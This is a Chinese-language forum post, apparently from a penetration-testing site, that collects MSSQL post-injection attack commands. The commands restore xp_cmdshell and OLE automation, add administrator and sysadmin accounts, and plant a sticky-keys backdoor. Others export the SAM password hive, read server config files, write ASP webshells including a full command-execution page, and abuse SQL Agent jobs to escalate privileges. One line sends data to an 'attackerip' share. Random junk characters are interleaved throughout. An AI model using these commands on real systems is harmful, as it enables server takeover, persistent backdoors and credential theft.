中国网络渗透测试联盟

标题: XP_CMDSHELL恢复方法大全 [打印本页]

---

作者: admin    时间: 2012-9-15 14:37
标题: XP_CMDSHELL恢复方法大全
1 未能找到存储过程'master..xpcmdshell'.  EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( D7 b& C3 n6 M, r然后按F5键命令执行完毕
, @* G# j3 Z) |9 C
% T8 M( m5 v; A$ n- K2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
7 x# W' U- x+ e5 K第一步执行：EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
1 J: Z& o1 p3 @4 m  K第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

; i9 |. J, k0 d5 j9 A5 w1 ?, s3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
& g2 `# r2 U' N6 p# j$ N! R3 V恢复方法：查询分离器连接后,
) A+ m3 f4 c6 Y2 Y2 o7 W第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# i" \* Q; [! F, C/ O) k第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'      
然后按F5键命令执行完毕
7 m; ~/ J" w* H3 R% A9 T
4 终极方法.
- u, I1 ~" ], ^. p如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
1 l+ G) t- ]0 C6 \3 V7 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'

4 l( |4 [/ `" {! @7 ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
. U  f9 l" s' _5 ~9 U7 v7 Z
xp或2003server系统:
: q: G# q! `! |! v7 _1 N/ f, }7 D
+ Y% r, m2 n. c9 @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

& L& A, f  l6 X5 a. t) _5 qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'


五个SHIFT
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
; g* g! ~7 h3 F* G% m$ Z/ K  l
; H+ I9 ]' b7 O5 t6 S5 f8 Jdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
$ q) ^% X9 H6 }1 ]$ F' E
xp_cmdshell执行命令另一种方法
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
1 R8 j/ I. S" l9 v
判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK


* Q  n. o3 ^- ]* Q6 ]上传xplog70.dll恢复xp_cmdshell语句:
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
0 W0 @5 ~! n2 y9 g1 D) }! `
( {( a& p9 ~" q* F; z( B/ ?. s' v

0 j; e+ s& v; B$ j; K首先开启沙盘模式：
3 Z1 j7 v6 K1 Z* M- @2 N. Y$ V6 lexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
5 L4 r  S; w- c) o, I& l, s
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  C. ]' ~; y0 X; [% j2 x! o  o2 T返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1--  发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
1 R. z- k- W7 N* ~1 T" B
% Y9 y& [4 U" q3 [% C( S! h0 L* q

恢复过程sp_addextendedproc 如下：
/ ?3 Q. P1 I6 |" Wcreate procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
. x7 z$ F; t% Z( m7 Z0 \% Ebegin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
! H7 w. S$ `! |" e& A! s+ J8 Zend
dbcc addextendedproc( @functname, @dllname)
. A0 M$ z- b4 W$ k2 Z6 C" M/ Ireturn (0) -- sp_addextendedproc
- f+ a  W1 }1 \- ?3 P& OGO
8 x" ~" V8 w. k7 a


导出管理员密码文件
8 f4 Z' ^+ V) qsa默认可以读sam键.应该。
8 ~8 V  ^$ E2 n  Vreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
! v5 E( k4 W; ^% |0 ?用完机器后
reg import c:\test.reg
根本不用克隆.
找到对应的sid.

# ~5 t- l; S9 A. S8 p9 P% \) C$ z

恢复所有存储过程
( |4 l6 c3 `4 x' duse master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
8 w4 S& k4 |/ Z: T% Xexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
7 I: S" ?9 N# M: _exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& O. V$ q% S  f7 Qexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
9 C/ l' r# _; f$ Z3 Gexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
7 M  J8 e4 U6 s0 p+ {3 Jexec sp_addextendedproc xp_regread,'xpstar.dll'
! @% y$ Q7 C% B2 l$ z, q  A7 Lexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
0 t$ N* s! ]) C) ~% d8 m$ [exec sp_addextendedproc xp_regwrite,'xpstar.dll'
! u$ A- i/ k4 D) Jexec sp_addextendedproc xp_availablemedia,'xpstar.dll'


建立读文件的存储过程
& f% T$ `4 ~! I4 {- rCreate proc sp_readTextFile @filename sysname
- M! N' v; c0 y& G/ [as

    begin
; R! [( `5 p9 n5 t    set nocount on
3 V) K9 F0 u" d; r. K* |    Create table #tempfile (line varchar(8000))
% H0 @( g' k6 v    exec ('bulk insert #tempfile from "' + @filename + '"')
4 Z5 N4 R) _+ i. z% R2 u    select * from #tempfile
    drop table #tempfile
, M- {, E: ~# r  O; u+ z  E7 S" fEnd
. |5 p. p, w, H+ W( ?
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
查看登录用户
Select * from sysxlogins

把文件内容读取到表中
BULK INSERT tmp from "c:\test.txt"
' c7 A' s' v# Z" N/ ]% z/ s% [3 odElete from 表名 清理表里的内容
create table b_test(fn nvarchar(4000));建一个表,字段为fn

: R  U9 d4 N: s
加sa用户
exec master.dbo.sp_addlogin user,pass;
exec master.dbo.sp_addsrvrolemember user,sysadmin
: g0 j  |2 y9 e9 W. _! B: e
6 l- V% d8 Z' L  J
: w/ ?; \* m* K4 J$ B/ g
8 S! W! \) j9 P6 O3 |读文件代码
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
# P/ U; t2 c8 X8 e! H" S5 {3 @exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
exec @ret = sp_oamethod @f, 'readline', @line out
& l; D: {9 T1 H! p' xwhile( @ret = 0 )
begin
print @line
/ i" n& |% A( s* P7 ~- Kexec @ret = sp_oamethod @f, 'readline', @line out
end


写文件代码：
) T. g" i$ s' [+ ]* b, kdeclare @o int, @f int, @t int, @ret int
; x' r: Y& b( L0 G' Cexec sp_oacreate 'scripting.filesystemobject', @o out
/ `/ c* n; @4 R: z# bexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》


- P7 ^: F$ V  {添加lake2 shell
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
sp_dropextendedproc xp_lake2
EXEC xp_lake2 'net user'

" h/ N- U( p$ O, ?6 x+ ~
& _$ O+ I( g3 n( Q得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
, j1 k: G% _, v0 zexecute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
5 O5 D7 z3 W3 g8 l
% m! W! i) z( G9 H! {
/ Y' L+ I' m) ^! R- e, p/ s" c- w2 |读serv-u配置信息
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
( K0 ]# x+ n& j1 }' {7 x8 m# Sexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'

通过xp_regwrite写SHIFT后门
% u# i6 X8 D5 y8 s; texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
8 ^2 B1 h$ R# x

- H. U# W" m! D! }/ y* d0 |5 d4 {
6 U0 p. q# c) Q, I5 c找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
; |$ ]/ e# d% `1 }5 ^+ u6 `
* s8 Y& t' x& S6 k- K% K4 J5 vEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
/ S, ?- ^+ _4 L$ \& e! _9 E
: w3 e5 n0 |3 d
- j+ b* ^" F% J% P( E
sql server 2005下开启xp_cmdshell的办法
# U2 V2 W! I, R" p% c( q) _
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

1 B, A( C% f( [" y7 r) fSQL2005开启'OPENROWSET'支持的方法：

7 V: j8 {; ]; {6 Gexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
. l& W. x# m1 i  k1 v
$ h2 F' A+ X1 V- w1 {: K6 O% KSQL2005开启'sp_oacreate'支持的方法:
9 w' I' `" ^8 {- n$ z
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
: N! h5 a( }2 l7 k& `0 {


9 w" }7 ^/ j0 z; N. f1 P% z
; l9 q& y( @* W/ a: G" Q8 T) Q+ [1 D

1 ]& n/ K3 B7 m& T3 [- H0 A2 H
+ O$ [) Y1 ~. O. L+ K9 h2 A. m
" t: Z# g2 |& w) |
' Y# S* z' R) K' C


0 a' [+ O1 I* O, H  H1 _7 j

8 _4 T/ x4 \+ M' n6 h0 L4 V/ U
$ u( U. j- t9 E  R" `! N
) M# M1 ]# g0 c& F" w
  {, H$ m  U1 W3 e* d+ m. r% N
2 b' E1 I; r: }6 X8 r# X

8 i1 A& b, w* R; N' p! c/ h0 ^
0 N! {5 N* I- m" U

- q, K$ z/ t' `3 `' B9 r/ u/ I$ a" B6 J# \
: W. ?7 o1 D8 S3 w以下方面不知道能不能成功暂且留下研究哈:
/ I: p( q2 H- a4 w5 P4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name= czy82 ;
, R8 b& {: S$ _2 B( q5 {exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
; F8 K  C. ?4 S: mexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
exec sp_start_job @job_name= czy82 ;
1 s: Z2 Y9 X# l4 @: N
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql，后面的我们就可以
8 j1 q: o8 w& g& `. W执行tsql语句了.
8 M9 g) T- T6 m0 S对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
. ?! y, E* h! ~( c. x) K第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
4 b4 ?6 ?, h" _# I2 _net start SQLSERVERAGENT
- z8 G( l7 I& j) ?, a5 L$ Z3 I: o
" E# D! W% O# ~2 b: A6 K对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
7 E/ z; n7 s3 K+ g3 MEXEC sp_add_job @job_name = GetSystemOnSQL ,
6 j9 }5 ~; _/ I5 a! @@enabled = 1,
@description = This will give a low privileged user access to
* z5 z5 i+ ^9 u4 V5 j: l6 e1 axp_cmdshell ,
@delete_level = 1
8 z1 K& U! r4 h. i$ k& P3 ?EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
@subsystem = TSQL ,
@command = exec master..xp_execresultset N select exec
0 Y% v! Z4 U% p. i5 x" y" U3 U$ Bmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
@server_name = 你的SQL的服务器名
: R, [+ u" F+ e, s; \' [EXEC sp_start_job @job_name = GetSystemOnSQL
' Q" m" x3 Z* ?& P# F, N
不要怀疑上面的代码，我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell

$ x& k( s" I- b$ G* m5 |5 B* [5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

USE msdb
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
0 D! z, R1 V2 q/ l3 a@enabled = 1,
8 v5 N5 M& h( b7 ?5 }: z@description = This will create a file called c:\sqlafc123.txt ,
# _: S9 k) ^" b! J) X@delete_level = 1
" F. _. U7 Y$ n7 C! CEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
0 Q/ |3 [: b( E- `5 |@step_name = SQLAFC ,
! h' k- y3 U4 w* t& l@subsystem = TSQL ,
* E& C9 b& ^# A8 i, i$ i@command = select hello, this file was created by the SQL Agent. ,
@output_file_name = c:\sqlafc123.txt
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
  u7 e: D) R. L' t% M@server_name = SERVER_NAME
  B6 F( [! r1 @8 o6 \5 b) \7 w4 A$ xEXEC sp_start_job @job_name = ArbitraryFilecreate

如果subsystem选的是:tsql，在生成的文件的头部有如下内容

6 A! ^( `; y% D??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
' m( V4 Z) i: V% U# ~8 I' ]----------------------------------------------
hello, this file was created by the SQL Agent.
; |( q7 r) d3 q5 m% ]: d4 s
, b" h+ I6 p' p1 R4 }(1 ?????)
" u/ W; ]! k( L" z& x* w
, ^9 \' N# i5 r3 Z/ d" o所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
" G' n. d# }/ _. n: j: y* _1 j7 _命令的vbs文件到启动目录!

+ n( L; g/ R0 P. W" x- _6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
0 m, o* n' K" X  j3 B9 j3 rset concat_null_yields_null off
select @command= dir c:\ > "\\attackerip\share\dir.txt"
- S) G) C/ _" ^2 Z: }' K# R+ uselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
2 j4 e! d8 n/ [, J8 @exec sp_MScopyscriptfile @scripfile ,

这两个东东都还在测试试哟
+ O2 G& [5 Y8 ]- B让MSSQL的public用户得到一个本机的web shell

sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
--@query= select <img src=vbscript:msgbox(now())>
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
2 W( B1 I+ {4 Y@query= select
" s- I% @8 C7 Z  d6 y; X4 }2 f<%On Error Resume Next
: C7 [  Y& F$ P- N5 v! z$ HSet oscript = Server.createObject("wscript.SHELL")
1 c/ F% ]1 U% X# ^' zSet oscriptNet = Server.createObject("wscript.NETWORK")
! B. J+ Y3 H+ r7 n3 ASet oFileSys = Server.createObject("scripting.FileSystemObject")
4 J. g  X# C4 G/ I% T" x0 lszCMD = Request.Form(".CMD")
0 C# s# T) j$ J/ A3 {If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
' u) n/ R. z8 ]) q; [) ~8 [Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
% \4 z9 m, V9 s  O. T<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="OST">
1 ^2 S( b( [5 ^- }1 o, p* Z, z<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><RE>
<% If (IsObject(oFile))Then
. A& [$ u5 Z; m. y  nOn Error Resume Next
7 L- b: x, u" n4 i7 cResponse.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
+ ?! Z* Q/ J. V5 ~/ [End If%>
& B( J0 F7 p: N5 h</BODY></HTML>

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2